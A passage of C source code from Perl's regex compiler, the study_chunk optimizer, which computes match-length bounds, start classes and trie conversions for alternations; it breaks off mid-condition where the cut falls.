S_study_chunk(pTHX_ RExC_state_t *pRExC_state, regnode **scanp,
SSize_t *minlenp, SSize_t *deltap,
regnode *last,
scan_data_t *data,
I32 stopparen,
U32 recursed_depth,
regnode_ssc *and_withp,
U32 flags, U32 depth)
/* scanp: Start here (read-write). */
/* deltap: Write maxlen-minlen here. */
/* last: Stop before this one. */
/* data: string data about the pattern */
/* stopparen: treat close N as END */
/* recursed: which subroutines have we recursed into */
/* and_withp: Valid if flags & SCF_DO_STCLASS_OR */
{
dVAR;
/* There must be at least this number of characters to match */
SSize_t min = 0;
I32 pars = 0, code;
regnode *scan = *scanp, *next;
SSize_t delta = 0;
int is_inf = (flags & SCF_DO_SUBSTR) && (data->flags & SF_IS_INF);
int is_inf_internal = 0; /* The studied chunk is infinite */
I32 is_par = OP(scan) == OPEN ? ARG(scan) : 0;
scan_data_t data_fake;
SV *re_trie_maxbuff = NULL;
regnode *first_non_open = scan;
SSize_t stopmin = SSize_t_MAX;
scan_frame *frame = NULL;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_STUDY_CHUNK;
RExC_study_started= 1;
Zero(&data_fake, 1, scan_data_t);
if ( depth == 0 ) {
while (first_non_open && OP(first_non_open) == OPEN)
first_non_open=regnext(first_non_open);
}
fake_study_recurse:
DEBUG_r(
RExC_study_chunk_recursed_count++;
);
DEBUG_OPTIMISE_MORE_r(
{
Perl_re_indentf( aTHX_ "study_chunk stopparen=%ld recursed_count=%lu depth=%lu recursed_depth=%lu scan=%p last=%p",
depth, (long)stopparen,
(unsigned long)RExC_study_chunk_recursed_count,
(unsigned long)depth, (unsigned long)recursed_depth,
scan,
last);
if (recursed_depth) {
U32 i;
U32 j;
for ( j = 0 ; j < recursed_depth ; j++ ) {
for ( i = 0 ; i < (U32)RExC_total_parens ; i++ ) {
if (
PAREN_TEST(RExC_study_chunk_recursed +
( j * RExC_study_chunk_recursed_bytes), i )
&& (
!j ||
!PAREN_TEST(RExC_study_chunk_recursed +
(( j - 1 ) * RExC_study_chunk_recursed_bytes), i)
)
) {
Perl_re_printf( aTHX_ " %d",(int)i);
break;
}
}
if ( j + 1 < recursed_depth ) {
Perl_re_printf( aTHX_ ",");
}
}
}
Perl_re_printf( aTHX_ "\n");
}
);
while ( scan && OP(scan) != END && scan < last ){
UV min_subtract = 0; /* How many chars to subtract from the minimum
node length to get a real minimum (because
the folded version may be shorter) */
bool unfolded_multi_char = FALSE;
/* Peephole optimizer: */
DEBUG_STUDYDATA("Peep", data, depth, is_inf);
DEBUG_PEEP("Peep", scan, depth, flags);
/* The reason we do this here is that we need to deal with things like
* /(?:f)(?:o)(?:o)/ which can't be dealt with by the normal EXACT
* parsing code, as each (?:..) is handled by a different invocation of
* reg() -- Yves
*/
JOIN_EXACT(scan,&min_subtract, &unfolded_multi_char, 0);
/* Follow the next-chain of the current node and optimize
away all the NOTHINGs from it.
*/
rck_elide_nothing(scan);
/* The principal pseudo-switch. Cannot be a switch, since we
look into several different things. */
if ( OP(scan) == DEFINEP ) {
SSize_t minlen = 0;
SSize_t deltanext = 0;
SSize_t fake_last_close = 0;
I32 f = SCF_IN_DEFINE;
StructCopy(&zero_scan_data, &data_fake, scan_data_t);
scan = regnext(scan);
assert( OP(scan) == IFTHEN );
DEBUG_PEEP("expect IFTHEN", scan, depth, flags);
data_fake.last_closep= &fake_last_close;
minlen = *minlenp;
next = regnext(scan);
scan = NEXTOPER(NEXTOPER(scan));
DEBUG_PEEP("scan", scan, depth, flags);
DEBUG_PEEP("next", next, depth, flags);
/* we suppose the run is continuous, last=next...
* NOTE we don't use the return here! */
/* DEFINEP study_chunk() recursion */
(void)study_chunk(pRExC_state, &scan, &minlen,
&deltanext, next, &data_fake, stopparen,
recursed_depth, NULL, f, depth+1);
scan = next;
} else
if (
OP(scan) == BRANCH ||
OP(scan) == BRANCHJ ||
OP(scan) == IFTHEN
) {
next = regnext(scan);
code = OP(scan);
/* The op(next)==code check below is to see if we
* have "BRANCH-BRANCH", "BRANCHJ-BRANCHJ", "IFTHEN-IFTHEN"
* IFTHEN is special as it might not appear in pairs.
* Not sure whether BRANCH-BRANCHJ is possible; regardless,
* we don't handle it cleanly. */
if (OP(next) == code || code == IFTHEN) {
/* NOTE - There is similar code to this block below for
* handling TRIE nodes on a re-study. If you change stuff here
* check there too. */
SSize_t max1 = 0, min1 = SSize_t_MAX, num = 0;
regnode_ssc accum;
regnode * const startbranch=scan;
if (flags & SCF_DO_SUBSTR) {
/* Cannot merge strings after this. */
scan_commit(pRExC_state, data, minlenp, is_inf);
}
if (flags & SCF_DO_STCLASS)
ssc_init_zero(pRExC_state, &accum);
while (OP(scan) == code) {
SSize_t deltanext, minnext, fake;
I32 f = 0;
regnode_ssc this_class;
DEBUG_PEEP("Branch", scan, depth, flags);
num++;
StructCopy(&zero_scan_data, &data_fake, scan_data_t);
if (data) {
data_fake.whilem_c = data->whilem_c;
data_fake.last_closep = data->last_closep;
}
else
data_fake.last_closep = &fake;
data_fake.pos_delta = delta;
next = regnext(scan);
scan = NEXTOPER(scan); /* everything */
if (code != BRANCH) /* everything but BRANCH */
scan = NEXTOPER(scan);
if (flags & SCF_DO_STCLASS) {
ssc_init(pRExC_state, &this_class);
data_fake.start_class = &this_class;
f = SCF_DO_STCLASS_AND;
}
if (flags & SCF_WHILEM_VISITED_POS)
f |= SCF_WHILEM_VISITED_POS;
/* we suppose the run is continuous, last=next...*/
/* recurse study_chunk() for each BRANCH in an alternation */
minnext = study_chunk(pRExC_state, &scan, minlenp,
&deltanext, next, &data_fake, stopparen,
recursed_depth, NULL, f, depth+1);
if (min1 > minnext)
min1 = minnext;
if (deltanext == SSize_t_MAX) {
is_inf = is_inf_internal = 1;
max1 = SSize_t_MAX;
} else if (max1 < minnext + deltanext)
max1 = minnext + deltanext;
scan = next;
if (data_fake.flags & (SF_HAS_PAR|SF_IN_PAR))
pars++;
if (data_fake.flags & SCF_SEEN_ACCEPT) {
if ( stopmin > minnext)
stopmin = min + min1;
flags &= ~SCF_DO_SUBSTR;
if (data)
data->flags |= SCF_SEEN_ACCEPT;
}
if (data) {
if (data_fake.flags & SF_HAS_EVAL)
data->flags |= SF_HAS_EVAL;
data->whilem_c = data_fake.whilem_c;
}
if (flags & SCF_DO_STCLASS)
ssc_or(pRExC_state, &accum, (regnode_charclass*)&this_class);
}
if (code == IFTHEN && num < 2) /* Empty ELSE branch */
min1 = 0;
if (flags & SCF_DO_SUBSTR) {
data->pos_min += min1;
if (data->pos_delta >= SSize_t_MAX - (max1 - min1))
data->pos_delta = SSize_t_MAX;
else
data->pos_delta += max1 - min1;
if (max1 != min1 || is_inf)
data->cur_is_floating = 1;
}
min += min1;
if (delta == SSize_t_MAX
|| SSize_t_MAX - delta - (max1 - min1) < 0)
delta = SSize_t_MAX;
else
delta += max1 - min1;
if (flags & SCF_DO_STCLASS_OR) {
ssc_or(pRExC_state, data->start_class, (regnode_charclass*) &accum);
if (min1) {
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
flags &= ~SCF_DO_STCLASS;
}
}
else if (flags & SCF_DO_STCLASS_AND) {
if (min1) {
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) &accum);
flags &= ~SCF_DO_STCLASS;
}
else {
/* Switch to OR mode: cache the old value of
* data->start_class */
INIT_AND_WITHP;
StructCopy(data->start_class, and_withp, regnode_ssc);
flags &= ~SCF_DO_STCLASS_AND;
StructCopy(&accum, data->start_class, regnode_ssc);
flags |= SCF_DO_STCLASS_OR;
}
}
if (PERL_ENABLE_TRIE_OPTIMISATION &&
OP( startbranch ) == BRANCH )
{
/* demq.
Assuming this was/is a branch we are dealing with: 'scan'
now points at the item that follows the branch sequence,
whatever it is. We now start at the beginning of the
sequence and look for subsequences of
BRANCH->EXACT=>x1
BRANCH->EXACT=>x2
tail
which would be constructed from a pattern like
/A|LIST|OF|WORDS/
If we can find such a subsequence we need to turn the first
element into a trie and then add the subsequent branch exact
strings to the trie.
We have two cases
1. patterns where the whole set of branches can be
converted.
2. patterns where only a subset can be converted.
In case 1 we can replace the whole set with a single regop
for the trie. In case 2 we need to keep the start and end
branches so
'BRANCH EXACT; BRANCH EXACT; BRANCH X'
becomes BRANCH TRIE; BRANCH X;
There is an additional case, that being where there is a
common prefix, which gets split out into an EXACT like node
preceding the TRIE node.
If x(1..n)==tail then we can do a simple trie; if not, we make
a "jump" trie, such that when we match the appropriate word
we "jump" to the appropriate tail node. Essentially we turn
a nested if into a case structure of sorts.
*/
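/* Rough before/after sketch of the two cases described above (regop names
* abbreviated, padding regops omitted):
*   case 1: BRANCH EXACT"foo"; BRANCH EXACT"bar"; BRANCH EXACT"baz"; tail
*           ==> TRIE(foo|bar|baz); tail
*   case 2: BRANCH EXACT"foo"; BRANCH EXACT"bar"; BRANCH X; tail
*           ==> BRANCH TRIE(foo|bar); BRANCH X; tail
* and in either case a common prefix may additionally be split out into an
* EXACT-like node placed in front of the TRIE node. */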
int made=0;
if (!re_trie_maxbuff) {
re_trie_maxbuff = get_sv(RE_TRIE_MAXBUF_NAME, 1);
if (!SvIOK(re_trie_maxbuff))
sv_setiv(re_trie_maxbuff, RE_TRIE_MAXBUF_INIT);
}
if ( SvIV(re_trie_maxbuff)>=0 ) {
regnode *cur;
regnode *first = (regnode *)NULL;
regnode *last = (regnode *)NULL;
regnode *tail = scan;
U8 trietype = 0;
U32 count=0;
/* var tail is used because there may be a TAIL
regop in the way. I.e., the exacts will point to the
thing following the TAIL, but the last branch will
point at the TAIL. So we advance tail. If we
have nested (?:) we may have to move through several
tails.
*/
while ( OP( tail ) == TAIL ) {
/* this is the TAIL generated by (?:) */
tail = regnext( tail );
}
DEBUG_TRIE_COMPILE_r({
regprop(RExC_rx, RExC_mysv, tail, NULL, pRExC_state);
Perl_re_indentf( aTHX_ "%s %" UVuf ":%s\n",
depth+1,
"Looking for TRIE'able sequences. Tail node is ",
(UV) REGNODE_OFFSET(tail),
SvPV_nolen_const( RExC_mysv )
);
});
/*
Step through the branches
cur represents each branch,
noper is the first thing to be matched as part
of that branch
noper_next is the regnext() of that node.
We normally handle a case like this
/FOO[xyz]|BAR[pqr]/ via a "jump trie" but we also
support building with NOJUMPTRIE, which restricts
the trie logic to structures like /FOO|BAR/.
If noper is a trieable nodetype then the branch is
a possible optimization target. If we are building
under NOJUMPTRIE then we require that noper_next is
the same as scan (our current position in the regex
program).
Once we have two or more consecutive such branches
we can create a trie of the EXACT's contents and
stitch it in place into the program.
If the sequence represents all of the branches in
the alternation we replace the entire thing with a
single TRIE node.
Otherwise when it is a subsequence we need to
stitch it in place and replace only the relevant
branches. This means the first branch has to remain
as it is used by the alternation logic, and its
next pointer, and needs to be repointed at the item
on the branch chain following the last branch we
have optimized away.
This could be either a BRANCH, in which case the
subsequence is internal, or it could be the item
following the branch sequence in which case the
subsequence is at the end (which does not
necessarily mean the first node is the start of the
alternation).
TRIE_TYPE(X) is a define which maps the optype to a
trietype.
optype | trietype
----------------+-----------
NOTHING | NOTHING
EXACT | EXACT
EXACT_ONLY8 | EXACT
EXACTFU | EXACTFU
EXACTFU_ONLY8 | EXACTFU
EXACTFUP | EXACTFU
EXACTFAA | EXACTFAA
EXACTL | EXACTL
EXACTFLU8 | EXACTFLU8
*/
#define TRIE_TYPE(X) ( ( NOTHING == (X) ) \
? NOTHING \
: ( EXACT == (X) || EXACT_ONLY8 == (X) ) \
? EXACT \
: ( EXACTFU == (X) \
|| EXACTFU_ONLY8 == (X) \
|| EXACTFUP == (X) ) \
? EXACTFU \
: ( EXACTFAA == (X) ) \
? EXACTFAA \
: ( EXACTL == (X) ) \
? EXACTL \
: ( EXACTFLU8 == (X) ) \
? EXACTFLU8 \
: 0 )
/* don't use tail as the end marker for this traversal */
for ( cur = startbranch ; cur != scan ; cur = regnext( cur ) ) {
regnode * const noper = NEXTOPER( cur );
U8 noper_type = OP( noper );
U8 noper_trietype = TRIE_TYPE( noper_type );
#if defined(DEBUGGING) || defined(NOJUMPTRIE)
regnode * const noper_next = regnext( noper );
U8 noper_next_type = (noper_next && noper_next < tail) ? OP(noper_next) : 0;
U8 noper_next_trietype = (noper_next && noper_next < tail) ? TRIE_TYPE( noper_next_type ) :0;
#endif
DEBUG_TRIE_COMPILE_r({
regprop(RExC_rx, RExC_mysv, cur, NULL, pRExC_state);
Perl_re_indentf( aTHX_ "- %d:%s (%d)",
depth+1,
REG_NODE_NUM(cur), SvPV_nolen_const( RExC_mysv ), REG_NODE_NUM(cur) );
regprop(RExC_rx, RExC_mysv, noper, NULL, pRExC_state);
Perl_re_printf( aTHX_ " -> %d:%s",
REG_NODE_NUM(noper), SvPV_nolen_const(RExC_mysv));
if ( noper_next ) {
regprop(RExC_rx, RExC_mysv, noper_next, NULL, pRExC_state);
Perl_re_printf( aTHX_ "\t=> %d:%s\t",
REG_NODE_NUM(noper_next), SvPV_nolen_const(RExC_mysv));
}
Perl_re_printf( aTHX_ "(First==%d,Last==%d,Cur==%d,tt==%s,ntt==%s,nntt==%s)\n",
REG_NODE_NUM(first), REG_NODE_NUM(last), REG_NODE_NUM(cur),
PL_reg_name[trietype], PL_reg_name[noper_trietype], PL_reg_name[noper_next_trietype]
);
});
/* Is noper a trieable nodetype that can be merged
* with the current trie (if there is one)? */
if ( noper_trietype
&&
(
( noper_trietype == NOTHING )
|| ( trietype == NOTHING )
|| ( trietype == noper_trietype )
)
#ifdef NOJUMPTRIE
&& noper_next >= tail
#endif
&& count < U16_MAX)
{
/* Handle a mergeable trieable node. Either we are
* the first node in a new trieable sequence,
* in which case we do some bookkeeping;
* otherwise we update the end pointer. */
if ( !first ) {
first = cur;
if ( noper_trietype == NOTHING ) {
#if !defined(DEBUGGING) && !defined(NOJUMPTRIE)
regnode * const noper_next = regnext( noper );
U8 noper_next_type = (noper_next && noper_next < tail) ? OP(noper_next) : 0;
U8 noper_next_trietype = noper_next_type ? TRIE_TYPE( noper_next_type ) :0;
#endif
if ( noper_next_trietype ) {
trietype = noper_next_trietype;
} else if (noper_next_type) {
/* a NOTHING regop is 1 regop wide.
* We need at least two for a trie
* so we can't merge this in */
first = NULL;
}
} else {
trietype = noper_trietype;
}
} else {
if ( trietype == NOTHING )
trietype = noper_trietype;
last = cur;
}
if (first)
count++;
} /* end handle mergeable trieable node */
else {
/* handle an unmergeable node -
* noper may either be a trieable node which
* cannot be merged into the current trie,
* or a non-trieable node */
if ( last ) {
/* If last is set and trietype is not
* NOTHING then we have found at least two
* trieable branch sequences in a row of a
* similar trietype so we can turn them
* into a trie. If/when we allow NOTHING to
* start a trie sequence this condition
* will be required, and it isn't expensive
* so we leave it in for now. */
if ( trietype && trietype != NOTHING )
make_trie( pRExC_state,
startbranch, first, cur, tail,
count, trietype, depth+1 );
last = NULL; /* note: we clear/update
first, trietype etc below,
so we don't do it here */
}
if ( noper_trietype
#ifdef NOJUMPTRIE
&& noper_next >= tail
#endif
){
/* noper is trieable, so we can start a new
* trie sequence */
count = 1;
first = cur;
trietype = noper_trietype;
} else if (first) {
/* if we already saw a first but the
* current node is not trieable then we have
* to reset the first information. */
count = 0;
first = NULL;
trietype = 0;
}
} /* end handle unmergeable node */
} /* loop over branches */
DEBUG_TRIE_COMPILE_r({
regprop(RExC_rx, RExC_mysv, cur, NULL, pRExC_state);
Perl_re_indentf( aTHX_ "- %s (%d) <SCAN FINISHED> ",
depth+1, SvPV_nolen_const( RExC_mysv ), REG_NODE_NUM(cur));
Perl_re_printf( aTHX_ "(First==%d, Last==%d, Cur==%d, tt==%s)\n",
REG_NODE_NUM(first), REG_NODE_NUM(last), REG_NODE_NUM(cur),
PL_reg_name[trietype]
);
});
if ( last && trietype ) {
if ( trietype != NOTHING ) {
/* the last branch of the sequence was part of
* a trie, so we have to construct it here
* outside of the loop */
made= make_trie( pRExC_state, startbranch,
first, scan, tail, count,
trietype, depth+1 );
#ifdef TRIE_STUDY_OPT
if ( ((made == MADE_EXACT_TRIE &&
startbranch == first)
|| ( first_non_open == first )) &&
depth==0 ) {
flags |= SCF_TRIE_RESTUDY;
if ( startbranch == first
&& scan >= tail )
{
RExC_seen &=~REG_TOP_LEVEL_BRANCHES_SEEN;
}
}
#endif
} else {
/* at this point we know whatever we have is a
* NOTHING sequence/branch AND if 'startbranch'
* is 'first' then we can turn the whole thing
* into a NOTHING
*/
if ( startbranch == first ) {
regnode *opt;
/* the entire thing is a NOTHING sequence,
* something like this: (?:|) So we can
* turn it into a plain NOTHING op. */
DEBUG_TRIE_COMPILE_r({
regprop(RExC_rx, RExC_mysv, cur, NULL, pRExC_state);
Perl_re_indentf( aTHX_ "- %s (%d) <NOTHING BRANCH SEQUENCE>\n",
depth+1,
SvPV_nolen_const( RExC_mysv ), REG_NODE_NUM(cur));
});
OP(startbranch)= NOTHING;
NEXT_OFF(startbranch)= tail - startbranch;
for ( opt= startbranch + 1; opt < tail ; opt++ )
OP(opt)= OPTIMIZED;
}
}
} /* end if ( last) */
} /* TRIE_MAXBUF is non-zero */
} /* do trie */
}
else if ( code == BRANCHJ ) { /* single branch is optimized. */
scan = NEXTOPER(NEXTOPER(scan));
} else /* single branch is optimized. */
scan = NEXTOPER(scan);
continue;
} else if (OP(scan) == SUSPEND || OP(scan) == GOSUB) {
I32 paren = 0;
regnode *start = NULL;
regnode *end = NULL;
U32 my_recursed_depth= recursed_depth;
if (OP(scan) != SUSPEND) { /* GOSUB */
/* Do setup, note this code has side effects beyond
* the rest of this block. Specifically setting
* RExC_recurse[] must happen at least once during
* study_chunk(). */
paren = ARG(scan);
RExC_recurse[ARG2L(scan)] = scan;
start = REGNODE_p(RExC_open_parens[paren]);
end = REGNODE_p(RExC_close_parens[paren]);
/* NOTE we MUST always execute the above code, even
* if we do nothing with a GOSUB */
if (
( flags & SCF_IN_DEFINE )
||
(
(is_inf_internal || is_inf || (data && data->flags & SF_IS_INF))
&&
( (flags & (SCF_DO_STCLASS | SCF_DO_SUBSTR)) == 0 )
)
) {
/* no need to do anything here if we are in a define, */
/* or we are after some kind of infinite construct,
* so we can skip recursing into this item.
* Since it is infinite we will not change the maxlen
* or delta, and if we miss something that might raise
* the minlen it will merely pessimise a little.
*
* In other words, /(?(DEFINE)(?<foo>foo|food))a+(?&foo)/
* might result in a minlen of 1 and not of 4,
* but this doesn't make us mismatch; it just makes us try a bit
* harder than we should.
* */
scan= regnext(scan);
continue;
}
if (
!recursed_depth
||
!PAREN_TEST(RExC_study_chunk_recursed + ((recursed_depth-1) * RExC_study_chunk_recursed_bytes), paren)
) {
/* it is quite possible that there are more efficient ways
* to do this. We maintain a bitmap per level of recursion
* of which patterns we have entered so we can detect if a
* pattern creates a possible infinite loop. When we
* recurse down a level we copy the previous level's bitmap
* down. When we are at recursion level 0 we zero the top
* level bitmap. It would be nice to implement a different
* more efficient way of doing this. In particular the top
* level bitmap may be unnecessary.
*/
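/* Indexing sketch: the bit for paren 'p' at recursion depth 'd' is tested via
* PAREN_TEST(RExC_study_chunk_recursed + d * RExC_study_chunk_recursed_bytes, p),
* so each depth gets its own copy-on-descend bitmap of the parens already
* entered on the current recursion path. */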
if (!recursed_depth) {
Zero(RExC_study_chunk_recursed, RExC_study_chunk_recursed_bytes, U8);
} else {
Copy(RExC_study_chunk_recursed + ((recursed_depth-1) * RExC_study_chunk_recursed_bytes),
RExC_study_chunk_recursed + (recursed_depth * RExC_study_chunk_recursed_bytes),
RExC_study_chunk_recursed_bytes, U8);
}
/* we haven't recursed into this paren yet, so recurse into it */
DEBUG_STUDYDATA("gosub-set", data, depth, is_inf);
PAREN_SET(RExC_study_chunk_recursed + (recursed_depth * RExC_study_chunk_recursed_bytes), paren);
my_recursed_depth= recursed_depth + 1;
} else {
DEBUG_STUDYDATA("gosub-inf", data, depth, is_inf);
/* some form of infinite recursion, assume infinite length
* */
if (flags & SCF_DO_SUBSTR) {
scan_commit(pRExC_state, data, minlenp, is_inf);
data->cur_is_floating = 1;
}
is_inf = is_inf_internal = 1;
if (flags & SCF_DO_STCLASS_OR) /* Allow everything */
ssc_anything(data->start_class);
flags &= ~SCF_DO_STCLASS;
                    start= NULL; /* reset start so we don't recurse later on. */
}
} else {
paren = stopparen;
start = scan + 2;
end = regnext(scan);
}
if (start) {
scan_frame *newframe;
assert(end);
if (!RExC_frame_last) {
Newxz(newframe, 1, scan_frame);
SAVEDESTRUCTOR_X(S_unwind_scan_frames, newframe);
RExC_frame_head= newframe;
RExC_frame_count++;
} else if (!RExC_frame_last->next_frame) {
Newxz(newframe, 1, scan_frame);
RExC_frame_last->next_frame= newframe;
newframe->prev_frame= RExC_frame_last;
RExC_frame_count++;
} else {
newframe= RExC_frame_last->next_frame;
}
RExC_frame_last= newframe;
newframe->next_regnode = regnext(scan);
newframe->last_regnode = last;
newframe->stopparen = stopparen;
newframe->prev_recursed_depth = recursed_depth;
newframe->this_prev_frame= frame;
DEBUG_STUDYDATA("frame-new", data, depth, is_inf);
DEBUG_PEEP("fnew", scan, depth, flags);
frame = newframe;
scan = start;
stopparen = paren;
last = end;
depth = depth + 1;
recursed_depth= my_recursed_depth;
continue;
}
}
else if ( OP(scan) == EXACT
|| OP(scan) == EXACT_ONLY8
|| OP(scan) == EXACTL)
{
SSize_t l = STR_LEN(scan);
UV uc;
assert(l);
if (UTF) {
const U8 * const s = (U8*)STRING(scan);
uc = utf8_to_uvchr_buf(s, s + l, NULL);
l = utf8_length(s, s + l);
} else {
uc = *((U8*)STRING(scan));
}
min += l;
if (flags & SCF_DO_SUBSTR) { /* Update longest substr. */
/* The code below prefers earlier match for fixed
offset, later match for variable offset. */
if (data->last_end == -1) { /* Update the start info. */
data->last_start_min = data->pos_min;
data->last_start_max = is_inf
? SSize_t_MAX : data->pos_min + data->pos_delta;
}
sv_catpvn(data->last_found, STRING(scan), STR_LEN(scan));
if (UTF)
SvUTF8_on(data->last_found);
{
SV * const sv = data->last_found;
MAGIC * const mg = SvUTF8(sv) && SvMAGICAL(sv) ?
mg_find(sv, PERL_MAGIC_utf8) : NULL;
if (mg && mg->mg_len >= 0)
mg->mg_len += utf8_length((U8*)STRING(scan),
(U8*)STRING(scan)+STR_LEN(scan));
}
data->last_end = data->pos_min + l;
data->pos_min += l; /* As in the first entry. */
data->flags &= ~SF_BEFORE_EOL;
}
            /* ANDing with this code point leaves at most it; the result is no
             * longer locale-dependent, and can't match the null string */
if (flags & SCF_DO_STCLASS_AND) {
ssc_cp_and(data->start_class, uc);
ANYOF_FLAGS(data->start_class) &= ~SSC_MATCHES_EMPTY_STRING;
ssc_clear_locale(data->start_class);
}
else if (flags & SCF_DO_STCLASS_OR) {
ssc_add_cp(data->start_class, uc);
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
/* See commit msg 749e076fceedeb708a624933726e7989f2302f6a */
ANYOF_FLAGS(data->start_class) &= ~SSC_MATCHES_EMPTY_STRING;
}
flags &= ~SCF_DO_STCLASS;
}
else if (PL_regkind[OP(scan)] == EXACT) {
            /* But OP != EXACT!, so it is EXACTFish */
SSize_t l = STR_LEN(scan);
const U8 * s = (U8*)STRING(scan);
/* Search for fixed substrings supports EXACT only. */
if (flags & SCF_DO_SUBSTR) {
assert(data);
scan_commit(pRExC_state, data, minlenp, is_inf);
}
if (UTF) {
l = utf8_length(s, s + l);
}
if (unfolded_multi_char) {
RExC_seen |= REG_UNFOLDED_MULTI_SEEN;
}
min += l - min_subtract;
assert (min >= 0);
delta += min_subtract;
if (flags & SCF_DO_SUBSTR) {
data->pos_min += l - min_subtract;
if (data->pos_min < 0) {
data->pos_min = 0;
}
data->pos_delta += min_subtract;
if (min_subtract) {
data->cur_is_floating = 1; /* float */
}
}
if (flags & SCF_DO_STCLASS) {
SV* EXACTF_invlist = _make_exactf_invlist(pRExC_state, scan);
assert(EXACTF_invlist);
if (flags & SCF_DO_STCLASS_AND) {
if (OP(scan) != EXACTFL)
ssc_clear_locale(data->start_class);
ANYOF_FLAGS(data->start_class) &= ~SSC_MATCHES_EMPTY_STRING;
ANYOF_POSIXL_ZERO(data->start_class);
ssc_intersection(data->start_class, EXACTF_invlist, FALSE);
}
else { /* SCF_DO_STCLASS_OR */
ssc_union(data->start_class, EXACTF_invlist, FALSE);
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
/* See commit msg 749e076fceedeb708a624933726e7989f2302f6a */
ANYOF_FLAGS(data->start_class) &= ~SSC_MATCHES_EMPTY_STRING;
}
flags &= ~SCF_DO_STCLASS;
SvREFCNT_dec(EXACTF_invlist);
}
}
else if (REGNODE_VARIES(OP(scan))) {
SSize_t mincount, maxcount, minnext, deltanext, pos_before = 0;
I32 fl = 0, f = flags;
regnode * const oscan = scan;
regnode_ssc this_class;
regnode_ssc *oclass = NULL;
I32 next_is_eval = 0;
switch (PL_regkind[OP(scan)]) {
case WHILEM: /* End of (?:...)* . */
scan = NEXTOPER(scan);
goto finish;
case PLUS:
if (flags & (SCF_DO_SUBSTR | SCF_DO_STCLASS)) {
next = NEXTOPER(scan);
if ( OP(next) == EXACT
|| OP(next) == EXACT_ONLY8
|| OP(next) == EXACTL
|| (flags & SCF_DO_STCLASS))
{
mincount = 1;
maxcount = REG_INFTY;
next = regnext(scan);
scan = NEXTOPER(scan);
goto do_curly;
}
}
if (flags & SCF_DO_SUBSTR)
data->pos_min++;
min++;
/* FALLTHROUGH */
case STAR:
next = NEXTOPER(scan);
/* This temporary node can now be turned into EXACTFU, and
* must, as regexec.c doesn't handle it */
if (OP(next) == EXACTFU_S_EDGE) {
OP(next) = EXACTFU;
}
if ( STR_LEN(next) == 1
&& isALPHA_A(* STRING(next))
&& ( OP(next) == EXACTFAA
|| ( OP(next) == EXACTFU
&& ! HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE(* STRING(next)))))
{
/* These differ in just one bit */
U8 mask = ~ ('A' ^ 'a');
assert(isALPHA_A(* STRING(next)));
/* Then replace it by an ANYOFM node, with
* the mask set to the complement of the
* bit that differs between upper and lower
* case, and the lowest code point of the
* pair (which the '&' forces) */
OP(next) = ANYOFM;
ARG_SET(next, *STRING(next) & mask);
FLAGS(next) = mask;
}
if (flags & SCF_DO_STCLASS) {
mincount = 0;
maxcount = REG_INFTY;
next = regnext(scan);
scan = NEXTOPER(scan);
goto do_curly;
}
if (flags & SCF_DO_SUBSTR) {
scan_commit(pRExC_state, data, minlenp, is_inf);
/* Cannot extend fixed substrings */
data->cur_is_floating = 1; /* float */
}
is_inf = is_inf_internal = 1;
scan = regnext(scan);
goto optimize_curly_tail;
case CURLY:
if (stopparen>0 && (OP(scan)==CURLYN || OP(scan)==CURLYM)
&& (scan->flags == stopparen))
{
mincount = 1;
maxcount = 1;
} else {
mincount = ARG1(scan);
maxcount = ARG2(scan);
}
next = regnext(scan);
if (OP(scan) == CURLYX) {
I32 lp = (data ? *(data->last_closep) : 0);
scan->flags = ((lp <= (I32)U8_MAX) ? (U8)lp : U8_MAX);
}
scan = NEXTOPER(scan) + EXTRA_STEP_2ARGS;
next_is_eval = (OP(scan) == EVAL);
do_curly:
if (flags & SCF_DO_SUBSTR) {
if (mincount == 0)
scan_commit(pRExC_state, data, minlenp, is_inf);
/* Cannot extend fixed substrings */
pos_before = data->pos_min;
}
if (data) {
fl = data->flags;
data->flags &= ~(SF_HAS_PAR|SF_IN_PAR|SF_HAS_EVAL);
if (is_inf)
data->flags |= SF_IS_INF;
}
if (flags & SCF_DO_STCLASS) {
ssc_init(pRExC_state, &this_class);
oclass = data->start_class;
data->start_class = &this_class;
f |= SCF_DO_STCLASS_AND;
f &= ~SCF_DO_STCLASS_OR;
}
/* Exclude from super-linear cache processing any {n,m}
regops for which the combination of input pos and regex
pos is not enough information to determine if a match
will be possible.
For example, in the regex /foo(bar\s*){4,8}baz/ with the
regex pos at the \s*, the prospects for a match depend not
only on the input position but also on how many (bar\s*)
repeats into the {4,8} we are. */
if ((mincount > 1) || (maxcount > 1 && maxcount != REG_INFTY))
f &= ~SCF_WHILEM_VISITED_POS;
/* This will finish on WHILEM, setting scan, or on NULL: */
/* recurse study_chunk() on loop bodies */
minnext = study_chunk(pRExC_state, &scan, minlenp, &deltanext,
last, data, stopparen, recursed_depth, NULL,
(mincount == 0
? (f & ~SCF_DO_SUBSTR)
: f)
,depth+1);
if (flags & SCF_DO_STCLASS)
data->start_class = oclass;
if (mincount == 0 || minnext == 0) {
if (flags & SCF_DO_STCLASS_OR) {
ssc_or(pRExC_state, data->start_class, (regnode_charclass *) &this_class);
}
else if (flags & SCF_DO_STCLASS_AND) {
/* Switch to OR mode: cache the old value of
* data->start_class */
INIT_AND_WITHP;
StructCopy(data->start_class, and_withp, regnode_ssc);
flags &= ~SCF_DO_STCLASS_AND;
StructCopy(&this_class, data->start_class, regnode_ssc);
flags |= SCF_DO_STCLASS_OR;
ANYOF_FLAGS(data->start_class)
|= SSC_MATCHES_EMPTY_STRING;
}
} else { /* Non-zero len */
if (flags & SCF_DO_STCLASS_OR) {
ssc_or(pRExC_state, data->start_class, (regnode_charclass *) &this_class);
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
}
else if (flags & SCF_DO_STCLASS_AND)
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) &this_class);
flags &= ~SCF_DO_STCLASS;
}
if (!scan) /* It was not CURLYX, but CURLY. */
scan = next;
if (((flags & (SCF_TRIE_DOING_RESTUDY|SCF_DO_SUBSTR))==SCF_DO_SUBSTR)
/* ? quantifier ok, except for (?{ ... }) */
&& (next_is_eval || !(mincount == 0 && maxcount == 1))
&& (minnext == 0) && (deltanext == 0)
&& data && !(data->flags & (SF_HAS_PAR|SF_IN_PAR))
&& maxcount <= REG_INFTY/3) /* Complement check for big
count */
{
